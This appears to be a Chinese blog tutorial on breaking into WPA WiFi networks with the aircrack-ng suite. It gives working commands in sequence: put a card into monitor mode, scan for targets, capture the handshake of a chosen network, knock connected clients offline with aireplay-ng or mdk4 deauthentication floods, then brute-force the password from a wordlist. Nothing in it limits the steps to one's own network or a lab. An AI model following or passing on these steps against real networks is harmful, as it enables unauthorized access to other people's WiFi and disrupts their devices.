不会吧不会吧,不会真有人 1202 年还要破 WiFi 吧.jpg

WiFi 在连接时会有四次握手认证,而抓包就是抓取握手过程的密钥进行暴力破解。

给连接到 WiFi 的设备发送反认证攻击(deauth),在设备强制断开连接自动重连 WiFi 的过程中就能抓到握手包。

本文所出现注释:

{Channel} 为目标WiFi信道
{MAC} 为目标WiFi的MAC
{ClientMAC} 为当前连接该WiFi的客户端MAC

注意:全程请在 root 用户下运行命令。

# 抓包过程

  1. 终止影响 aircrack-ng 进程
h
service network-manager stop
airmon-ng check kill
  1. 列出当前支持的无线网卡
    airmon-ng

如果没有任何输出表示无线网卡不支持监听模式或者物理问题(

  1. 激活网卡监听 (monitor) 模式
    airmon-ng start wlan0

命令执行后网卡接口会变为 wlan0mon

  1. 扫描 WiFi 网络
    airodump-ng wlan0mon

执行后会把周围的无线网络排序出来,其中上半部分为附近的 WiFi 列表,下半部分为附近 WiFi 中有设备连接的信息。当找到对应的 WiFi 且记住 MAC 以及信道后 Ctrl+C 终止扫描。

  1. 抓取握手包
    airodump-ng -c {Channel} --bssid {MAC} -w /tmp/wittoy wlan0mon

-w 后内容为保存路径,可自定义

这里须记住连接上该 WiFi 的客户端 MAC。

  1. 强制设备下线
    新建一个命令行窗口,这里有 2 种方式使客户端下线(推荐第一种)
  • Aireplay-ng 攻击
    aireplay-ng -0 30 -a {MAC} -c {ClientMAC} wlan0mon

  • MDK4 攻击
    mdk4 wlan0mon d -S {MAC} -c {Channal}

可加上 -s 控制速度,单位为 packets/sec
注意的是此方法过于暴力,请及时 Ctrl+C 停止.jpg


当步骤 5 中的命令窗口显示 [WPA handshake: xx:xx:xx:xx:xx:xx] 代表抓包成功。

如果你的系统自带字典的话可以用 Aireplay-ng 小跑一会儿热热身,但还是建议导出包使用 EWSA 等专业工具跑包。

aircrack-ng -w {字典路径} {所抓的包路径}

# 关闭网卡监听

airmon-ng stop wlan0mon
service network-manager start